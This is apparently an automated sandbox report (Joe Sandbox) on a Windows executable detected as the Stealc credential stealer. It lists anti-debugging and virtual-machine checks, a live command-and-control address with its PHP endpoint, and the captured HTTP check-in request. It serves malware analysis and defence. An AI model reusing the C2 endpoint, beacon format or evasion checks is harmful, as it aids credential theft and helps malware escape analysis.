                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DFD88 second address: 13DFD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF6744C8C9Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C6027F second address: 4C602C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF674E409BEh 0x0000000f push eax 0x00000010 jmp 00007FF674E409BBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov edx, eax 0x00000019 push eax 0x0000001a mov bl, 0Bh 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ax, CBA7h 0x00000027 mov al, 7Bh 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C6035B second address: 4C6036A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C6036A second address: 4C60370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C60370 second address: 4C60374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C60374 second address: 4C60378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1161AC6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00F138B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F14910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F0DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00F0E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00F14570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00F0ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F016D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F0F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00F13EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F68A FindFirstFileA, 0_2_00F0F68A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F0BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F0DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F01160 GetSystemInfo,ExitProcess, 0_2_00F01160
                Source: file.exe, file.exe, 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2091004955.00000000008D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091004955.0000000000903000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13627
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13624
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13638
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13678
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13645
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                barindex
Source: C:\Users\user\Desktop\file.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe; Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe; File opened: NTICE
Source: C:\Users\user\Desktop\file.exe; File opened: SICE
Source: C:\Users\user\Desktop\file.exe; File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F045C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F19750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F178E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes; Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe; Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: Process Memory Space: file.exe PID: 1164, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F19600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp; Binary or memory string: 7FProgram Manager
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F17B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F17980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F17850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00F17A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match; File source: 0.2.file.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 1164, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match; File source: 0.2.file.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 1164, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; a number before a technique is the report's hit count for that technique in this analysis, kept as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (Source | Detection | Scanner | Label)
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
URL detection (Source | Detection | Scanner | Label)
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
URLs found in memory (Name | Source | Malicious | Antivirus Detection | Reputation)
http://185.215.113.37 | file.exe, 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpTW | file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpxv | file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1524420
                      Start date and time:2024-10-02 19:07:02 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 0s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 85
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • VT rate limit hit for: file.exe
                      No simulations
Context by IP (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Context by ASN (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.951210825311078
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'793'024 bytes
                      MD5:9267e551326d9f70ca969543647f060b
                      SHA1:19a3f3bff029fb895b5d256d6d6a4cce1e5d8a85
                      SHA256:4ffb89ed6560f1f1e8c683cd4451982c9588cf8ac2846f652ba88e611dc639bd
                      SHA512:f90265f584d3ba3c0974d8c8a0968085a4716c8ca8251b858e33de0abfdba5acb37b0ffca3ff2c44fce1150b58eac1ed688a2d731bd84fd850785ea5424afb2d
                      SSDEEP:49152:OLXUAVXAcRNdrKXz/yDqffgb8sa0pQspR+MFVJYWz:UXFduXzI/ndQspRDFx
                      TLSH:0D853376B80EB76BC291C174CE769934F16DBC81E3E5D67B4E99112FCA6212CB023724
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0xa7a000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction:jmp 00007FF67468F39Ah
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | Is in Section)
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics)
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 8ee9cda0e4db25714f4b473fa9fa73d7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x28b000 | 0x200 | a95af7bbc0bb0cb5cc177a725842c373 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xmtfkgun | 0x4e9000 | 0x190000 | 0x18fa00 | b400b52569a4960d20957559e9e089ee | False | 0.9947668224116359 | data | 7.9523327915554285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
toxpwvxv | 0x679000 | 0x1000 | 0x400 | a355c09c6e725b877d0caaff3e3e1a8d | False | 0.78125 | data | 6.065996624503552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x67a000 | 0x3000 | 0x2200 | ba9d3e1c5df24907580f67261531556e | False | 0.40441176470588236 | DOS executable (COM) | 4.2619491113454355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports (DLL | Import)
kernel32.dll | lstrcpy
Suricata IDS alerts (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol)
2024-10-02T19:07:57.397568+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
Oct 2, 2024 19:07:56.475563049 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 2, 2024 19:07:56.480578899 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 2, 2024 19:07:56.480724096 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 2, 2024 19:07:56.480946064 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 2, 2024 19:07:56.485995054 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 2, 2024 19:07:57.169059992 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 2, 2024 19:07:57.169121981 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 2, 2024 19:07:57.172792912 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 2, 2024 19:07:57.178584099 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 2, 2024 19:07:57.397494078 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Oct 2, 2024 19:07:57.397567987 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Oct 2, 2024 19:08:00.269784927 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
HTTP session with 185.215.113.37 (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process)
0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 1164 | C:\Users\user\Desktop\file.exe
HTTP data (Timestamp | Bytes transferred | Direction | Data)
Oct 2, 2024 19:07:56.480946064 CEST | 89 | OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 2, 2024 19:07:57.169059992 CEST | 203 | IN
HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 17:07:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 2, 2024 19:07:57.172792912 CEST | 411 | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE
Host: 185.215.113.37
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii (multipart body, line breaks restored from the raw bytes):
------ECGDHIDAAFHIIDGDBFIE
Content-Disposition: form-data; name="hwid"

F77FB0207C0F807656615
------ECGDHIDAAFHIIDGDBFIE
Content-Disposition: form-data; name="build"

doma
------ECGDHIDAAFHIIDGDBFIE--
Oct 2, 2024 19:07:57.397494078 CEST | 210 | IN
HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 17:07:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64, decodes to "block")


                      Target ID:0
                      Start time:13:07:52
                      Start date:02/10/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0xf00000
                      File size:1'793'024 bytes
                      MD5 hash:9267E551326D9F70CA969543647F060B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:9.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:10.1%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
